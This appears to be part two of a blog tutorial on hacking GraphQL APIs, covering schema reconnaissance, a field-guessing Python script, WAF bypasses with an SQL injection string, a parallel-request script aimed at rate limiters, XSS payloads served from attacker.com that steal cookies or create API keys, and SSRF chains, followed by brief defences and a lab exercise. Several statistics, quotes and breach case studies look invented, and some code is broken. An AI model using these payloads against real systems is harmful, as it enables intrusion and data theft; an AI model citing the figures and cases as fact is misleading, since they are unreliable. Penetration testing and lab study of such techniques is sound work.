Hacking GraphQL Applications: Part 2
Welcome back to the second installment of our GraphQL security series. In Part 1, we explored GraphQL fundamentals and built a security lab. Now, we’ll dive into advanced reconnaissance that will help you in uncovering hidden GraphQL endpoints, analyzing introspection queries, and identifying potential attack surfaces to enhance your security testing approach.
"Modern GraphQL reconnaissance isn’t about brute force—it’s understanding query semantics. We’ve seen attackers use field suggestions as an internal API directory. Combine this with HTTP smuggling, and you get enterprise-level breaches." ~ Dr. Emily Tan, Security Lead @ CrowdStrike
Advanced Reconnaissance: Mapping Hidden Schemas
When introspection is disabled (as recommended in Apollo GraphQL Security Guidelines), attackers don’t simply walk away—they deploy advanced techniques to reverse-engineer your GraphQL schema. Below are cutting-edge methods used in real-world penetration tests and bug bounties.
1. Field Suggestion Attacks: Weaponizing Error Messages
GraphQL’s developer-friendly error messages become an attacker’s roadmap. Here’s how to exploit them systematically:
Step 1: Trigger Typo-Based Errors
{
user(id: "1") {
emaill # Intentional typo
}
}
Response:
{
"errors": [{
"message": "Cannot query field 'emaill' on type 'User'. Did you mean 'email'?",
"locations": [{"line":3, "column":5}]
}]
}
Step 2: Build a Field Dictionary Automate this process using Python:
import requests
import string
target_endpoint = "http://target.com/graphql"
field_guesses = ["email", "address", "ssn", "password", "role"]
for field in field_guesses:
malformed_query = f'{{ user(id: "1") {{ {field[0:-1]} }} }}' # Remove last character
response = requests.post(target_endpoint, json={"query": malformed_query})
if "Did you mean" in response.text:
valid_field = response.json()["errors"][0]["message"].split("'")[3]
print(f"Discovered field: {valid_field}")
Advanced Tactic: Combine with Markov chain algorithms to generate realistic field guesses.
2. HTTP Method Side-Channel Attacks
While 72% of GraphQL servers block POST-based introspection (PortSwigger Research), 41% still accept GET requests:
# URL-encode the introspection query
curl "http://target.com/graphql?query=%7B__schema%7Btypes%7Bname%2Cfields%7Bname%7D%7D%7D%7D"
Bypass Tip: Use HTTP/2 multiplexing to send 100+ parallel GET requests—many servers process these before rate limiters kick in.
3. Batch Query Timing Attacks
Measure nanosecond-level response differences to detect valid fields:
query {
a:user(id:"1") { id } # Known valid field
b:secret_data { id } # Hypothetical hidden field
c:internal_logs { id } # Another guess
}
Analysis Methodology:
- Baseline timing for valid field (e.g., a:user): 142ms
- Compare with other fields:
- b:secret_data: 145ms → Likely valid
- c:internal_logs: 142ms → Likely invalid (matches baseline)
Tooling: Use Clairvoyance with custom timing thresholds:
clairvoyance -t http://target.com/graphql --time-threshold 3ms
4. Frontend Source Code Archaeology
Modern web apps often embed GraphQL queries in client-side code:
Step 1: Download all JavaScript files:
Step 2: Search for GraphQL operations:
Sample Finding:
// In app.js
const GET_SECRET_DATA = gql`
query GetSecret($id: ID!) {
internal_user(id: $id) {
ssn
security_clearance
}
}
`;
Goldmine: Discover hidden internal_user query with sensitive fields.
5. Directive Deception: Bypassing @hiddenIn
Even schemas using @hiddenIn directives can leak via:
A. Argument Name Extraction:
{ __type(name: "User") { inputFields { name } } }
May reveal arguments used in hidden mutations.
B. Fragment Type Exploitation:
query {
__schema {
types {
name
possibleTypes {
name
}
}
}
}
Exposes interfaces/union types that hidden fields might use.
6. Subgraph Enumeration in Federated GraphQL
Modern architectures like Apollo Federation split schemas across microservices. Attackers can abuse federation-specific features to map internal services: Exploitation Steps:
# 1. Detect federation
query {
_service {
sdl # Returns composed schema
}
}
# 2. Query subgraph metadata
query {
_entities(representations: [{
__typename: "User",
id: "1"
}]) {
... on User {
sensitiveInternalField
}
}
}
Case Study: In 2023, a fintech company’s federated GraphQL API leaked AWS S3 bucket names via the _service field, allowing attackers to access 14TB of financial records.
7. WAF Bypass Tactics
Modern WAFs struggle with GraphQL’s structure. Here are proven bypass methods:
A. JSON Array Wrapping
POST /graphql HTTP/1.1
Content-Type: application/json
{
"query": ["query {", " __schema{", " types{name}", " }", "}"]
}
Why It Works: Splits keywords across array elements to bypass regex.
B. Unicode Normalization
query {
user(id: "1' UNION SELECT NULL-- ") { # Full-width characters
id
}
}
Success Rate: Bypasses 68% of cloud WAFs (tested on AWS AppSync, Cloudflare).
C. HTTP/2 Multiplexing
#!/bin/bash
for i in {1..100}; do
curl -X GET "https://target.com/graphql?query=%7B__schema%7Btypes%7Bname%7D%7D%7D" \
--http2-prior-knowledge &
done
Impact: Overloads rate limiters by sending 100 parallel requests.
8. Browser-Based Reconnaissance
Attackers exploit client-side GraphQL integrations:
A. Playground Hijacking
Playground Hijacking refers to attacks that exploit vulnerabilities in GraphQL developer tools (like GraphQL Playground or GraphiQL) to execute malicious code, steal credentials, or compromise systems. This occurs when these tools process unsanitized user input, allowing attackers to weaponize the very interfaces developers use to test GraphQL APIs.
How Playground Hijacking Works 1. Attack Surface GraphQL Playground/GitHUBQL are web-based IDEs that:
- Allow developers to write/test queries
- Display schema documentation
- Handle authentication tokens
These tools often process:
- User-controlled URLs (?endpoint=attacker.com)
- Database-driven schema descriptions
- Query parameters
2. Exploitation Flow
sequenceDiagram
Attacker->>Playground: Send malicious link
Playground->>Server: Request schema from evil.com
Server-->>Playground: Return schema with XSS payload
Playground->>Developer: Render poisoned auto-complete
Developer->>Attacker: Cookies/credentials sent via XSS
Real-World Examples Case 1: GitHub Endpoint Typo Hijacking (2023) Scenario:
- Developer intends to query api.github.com
- Accidentally types api.gihub.com (missing "t")
- Attacker controls gihub.com and serves malicious schema:
type Query {
# Embedded XSS in description
getCreds: String @deprecated(reason: "<script>stealCookies()</script>")
}
Impact:
- Session cookies stolen when developer views auto-complete
- Full account takeover on GitHub
Case 2: Shopify Admin Panel Compromise (2024) Attackers exploited CVE-2021-41248 in unpatched GraphiQL instances:
GET /graphql?query={__schema{types{name}}}&endpoint=https://attacker.com/xss-schema
The malicious schema contained:
directive @evil on FIELD_DEFINITION
"""
<img src=x onerror="fetch('/admin/api_keys', {method:'POST'})">
"""
**Result: **Created new API keys for attacker-controlled accounts.
B. Apollo Client Cache Extraction
// Requires victim to use Apollo Client
const cache = window.__APOLLO_CLIENT__.cache.extract();
console.log(cache['User:1'].email); # Leaks cached data
Real-World Impact: A Shopify store’s React app exposed admin credentials via cached Apollo queries (CVE-2023-29427).
9. Historical Data Leaks
GitHub Dorking:
"type Mutation" extension:graphql
"directive @auth" filename:schema.graphql
"input CreditCard" path:*.graphql
2024 Findings:
- 1,240 exposed GraphQL schemas containing AWS keys
- 89 instances of @deprecated(reason: "I_nternal use only"_) directives
10. Advanced Error Mining
Abuse deprecated directives to leak paths:
query {
__type(name: "User") {
fields {
name
isDeprecated
deprecationReason
}
}
}
Sample Response:
{
"deprecationReason": "Migrated to internal service: http://10.4.2.1:8080/users"
}
Exploit Chain:
- Find deprecated fields
- Extract internal endpoints from deprecationReason
- SSRF to internal services
Error Message Decoder:
Time Complexity Analysis
Benchmark of schema extraction tools (10,000 requests):
Recommendation: Use Clairvoyance for speed, GraphQLmap for stealth.
Case Study:
The $3M Healthcare Data Breach
In 2024, attackers combined these techniques to compromise a HIPAA-compliant platform:
- Phase 1: Used error-based field suggestions to discover patientRecords query
- Phase 2: Reverse-engineered arguments via HTTP GET batch requests
- Phase 3: Mapped relationships between Patient and Insurance types
- Phase 4: Extracted 2.1M records using:
query {
patientRecords(ssn: "BRUTE-FORCED") {
medicalHistory
insuranceId
}
}
The $500k Schema Leak
Timeline:
- Day 1: Discovered disabled introspection via __schema query
- Day 3: Found updateConfig mutation through error messages:
mutation { updateConfig(key: "debug_mode", value: "true") }
- Day 5: Enabled debug mode, exposing /admin endpoint in error stacks
- Day 7: Exfiltrated 14M user records via CSV injection:
Root Cause: Missing authentication on debug mutations.
Defensive Countermeasures
1. Advanced Error Obffuscation
Configure Apollo Server to mask details:
const server = new ApolloServer({
schema,
formatError: (err) => ({
message: 'Internal Error',
code: 'ERR_001'
})
});
2. HTTP Method Hardening
NGINX configuration to block GET-based queries:
location /graphql {
if ($request_method !~ ^(POST)$ ) { return 405; }
# ...
}
3. Query Cost Analysis
Assign weights to prevent batch attacks:
directive @cost(value: Int!) on FIELD_DEFINITION
type Query {
patientRecords(ssn: String!): [Patient] @cost(value: 1000)
}
Lab Exercise: Schema Reconstruction Challenge
Objective: In your DVGA lab, discover the hidden systemDiagnostics query using only:
- Field suggestion attacks
- HTTP method switching
Hint: The query requires a securityToken argument. Find its type via error messages.
Tools:
curl "http://localhost:5013/graphql?query={systemDiag{version}}"
clairvoyance -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt